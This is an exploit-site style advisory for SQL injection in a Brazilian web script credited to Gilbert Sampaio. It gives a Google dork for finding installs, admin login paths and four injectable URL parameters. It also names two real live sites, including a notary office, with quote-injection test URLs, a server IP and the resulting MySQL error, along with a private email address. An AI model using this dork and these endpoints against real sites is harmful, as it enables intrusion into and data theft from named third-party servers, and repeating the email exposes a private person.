Desenvolvido por Gilbert Sampaio SQL Injection

1. ###################################################
2.  
3. # Exploit Title : Desenvolvido por Gilbert Sampaio SQL Injection
4. # Author [ Discovered By ] : KingSkrupellos
5. # Team : Cyberizm Digital Security Army
6. # Date : 11/01/2019
7. # Vendor Homepage : pt-br.facebook.com/gilbert.sampaio.3
8. # Script Owner E-Mail : rec.batista@hotmail.com
9. # Tested On : Windows and Linux
10. # Category : WebApps
11. # Exploit Risk : Medium
12. # Google Dorks : intext:''Desenvolvido por Gilbert Sampaio."
13. # Vulnerability Type : CWE-89 [ Improper Neutralization of
14. Special Elements used in an SQL Command ('SQL Injection') ]
15.  
16. ###################################################
17.  
18. # Admin Panel Login Path :
19. *************************
20.  
21. /login.php
22. /amauto/login.php
23.  
24. # SQL Injection Exploit :
25. ***********************
26.  
27. /ver_news.php?ID=[SQL Injection]
28.  
29. /ver_info.php?ID=[SQL Injection]
30.  
31. /fotos.php?cod=[SQL Injection]
32.  
33. /ocartorio.php?ID=[SQL Injection]
34.  
35. ###################################################
36.  
37. # Example Vulnerable Site :
38. *************************
39.  
40. Note : (201.87.225.16) => There are 291 domains hosted on this server.
41.  
42. [+] cartoriovales.com.br/ver_info.php?ID=2%27 =>
43.  
44. [ Proof of Concept ] => archive.fo/IXb5x
45.  
46. [+] solucioncorrespondente.com.br/ver_info.php?ID=3%27
47.  
48. ###################################################
49.  
50. # SQL Database Error :
51. **********************
52. You have an error in your SQL syntax; check the manual
53. that corresponds to your MySQL server version
54. for the right syntax to use near 'Ativo'' at line 1
55.  
56. ?Erro 2: SELECT * FROM imagem WHERE album_id_Album = 1'
57.  
58. ###################################################
59.  
60. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
61.  
62. ###################################################